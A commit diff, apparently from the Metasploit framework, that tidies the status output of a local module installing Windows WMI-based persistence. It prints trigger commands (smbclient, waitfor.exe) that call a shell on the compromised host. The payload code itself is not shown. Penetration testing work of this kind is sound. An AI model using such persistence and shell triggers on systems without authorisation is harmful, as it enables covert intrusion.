tidy module output
parent
bc8de0fc66
commit
994f00622f
|
@ -91,6 +91,9 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
|
||||
host = session.session_host
|
||||
print_status('Installing Persistence...')
|
||||
|
||||
case datastore['PERSISTENCE_METHOD']
|
||||
when 'LOGON'
|
||||
psh_exec(subscription_logon)
|
||||
|
@ -102,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
remove_persistence
|
||||
when 'EVENT'
|
||||
psh_exec(subscription_event)
|
||||
print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
|
||||
print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
|
||||
remove_persistence
|
||||
when 'PROCESS'
|
||||
psh_exec(subscription_process)
|
||||
|
@ -110,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
remove_persistence
|
||||
when 'WAITFOR'
|
||||
psh_exec(subscription_waitfor)
|
||||
print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
|
||||
print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI "+datastore['WAITFOR_TRIGGER']+"\""
|
||||
remove_persistence
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue